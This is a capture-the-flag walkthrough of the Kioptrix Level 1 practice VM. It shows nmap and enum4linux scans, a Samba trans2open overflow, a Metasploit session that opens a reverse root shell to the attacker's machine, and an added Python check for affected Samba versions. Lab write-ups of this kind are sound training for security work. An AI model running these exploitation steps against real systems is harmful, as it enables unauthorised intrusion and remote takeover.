Kioptrix Level 1 is the first in a series of five. The point of the game is to get a root shell on the vulnerable machine. The Kioptrix VMs are intended for anyone who wants to start getting into pentesting, and they are similar to the VMs in the PWK course for those who want to get the OSCP certification. More info from the author is listed below, with the link to download the VM here.
Description from the author:
“These Kioptrix VM images are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.”
Without further ado, let's get started.
Kali Linux machine
Using netdiscover, I found the victim machine at IP address 192.168.182.151.
root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24
Scanning and enumeration
I used nmap to scan the victim and found it running OpenSSH 2.9p2 on port 22, Apache httpd 1.3.20 on ports 80 and 443, Samba smbd on port 139, and rpcbind on port 111.
root@kali:~# nmap -sS -T4 -A 192.168.182.151

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-02-10 22:11 CST
Nmap scan report for 192.168.182.151
Host is up (0.00025s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|   Potentially risky methods: TRACE
|_  See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32768/udp  status
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/http    Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-cisco-anyconnect:
|_  ERROR: Not a Cisco ASA or unsupported version
| http-methods:
|   Potentially risky methods: TRACE
|_  See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_ssl-date: 2017-02-11T05:13:37+00:00; +1h01m49s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
32768/tcp open  status      1 (RPC #100024)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32768/udp  status
MAC Address: 00:0C:29:C2:C8:5D (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: , NetBIOS MAC: (unknown)

TRACEROUTE
HOP RTT      ADDRESS
1   0.25 ms  192.168.182.151

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.35 seconds
I used nbtscan to gather NetBIOS information.
I did a simple SMB enumeration with enum4linux and found that the victim is running Samba 2.2.1a, which is vulnerable to the Samba trans2open overflow. The exploit can be found here.
root@kali:~# enum4linux -a 192.168.182.151
Samba TRANS2_OPEN Buffer Overflow
A description of this vulnerability, taken from Rapid7's Vulnerability & Exploit Database, is listed below. With that, I used the Metasploit module exploit/linux/samba/trans2open to exploit it.
Description: Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.
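The affected ranges in that description are easy to get wrong when triaging a banner such as the Samba 2.2.1a reported by enum4linux, because the fixed release carries a letter suffix (2.2.8 is affected, 2.2.8a is not). The checker below is an added example, not from the original post or from Rapid7; it assumes a letter suffix sorts after the bare release and leaves Samba-TNG, which uses its own numbering, out of scope.

```python
import re

def parse_samba_version(text):
    """Split a Samba version such as '2.2.1a' into ((2, 2, 1), 'a').
    Assumption: a letter suffix orders after the bare release, so 2.2.8 < 2.2.8a."""
    m = re.fullmatch(r"(\d+(?:\.\d+)*)([a-z]?)", text.strip())
    if not m:
        raise ValueError(f"unrecognised Samba version: {text!r}")
    return tuple(int(p) for p in m.group(1).split(".")), m.group(2)

def trans2open_affected(version):
    """True if the version is inside the ranges quoted in the description:
    2.2.x before 2.2.8a, or 2.0.10 and earlier in the 2.0.x line.
    Samba-TNG is not handled here."""
    nums, suffix = parse_samba_version(version)
    if nums[:2] == (2, 2):
        # tuple comparison handles both the numeric part and the suffix
        return (nums, suffix) < ((2, 2, 8), "a")
    if nums[:2] == (2, 0):
        return nums <= (2, 0, 10)
    return False

if __name__ == "__main__":
    for v in ("2.2.1a", "2.2.8", "2.2.8a", "2.0.10", "2.0.11", "3.0.20"):
        print(v, "affected" if trans2open_affected(v) else "not affected")
```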
msf > use exploit/linux/samba/trans2open
msf exploit(trans2open) > set RHOST 192.168.182.151
RHOST => 192.168.182.151
msf exploit(trans2open) > set LHOST 192.168.182.147
LHOST => 192.168.182.147
msf exploit(trans2open) > set PAYLOAD linux/x86/shell_reverse_tcp
PAYLOAD => linux/x86/shell_reverse_tcp
msf exploit(trans2open) > exploit

[*] Started reverse TCP handler on 192.168.182.147:4444
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
[*] Trying return address 0xbffffbfc...
[*] Trying return address 0xbffffafc...
[*] Command shell session 1 opened (192.168.182.147:4444 -> 192.168.182.151:32774) at 2017-02-11 00:16:11 -0600

id
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root
hostname
kioptrix.level1
After getting a root shell, I found the flag in /var/spool/mail, which said:
“If you are reading this, you got root. Congratulations.
Level 2 won’t be as easy…”.
Well, that's it for level 1. It will only get harder from here. Next up is Level 2.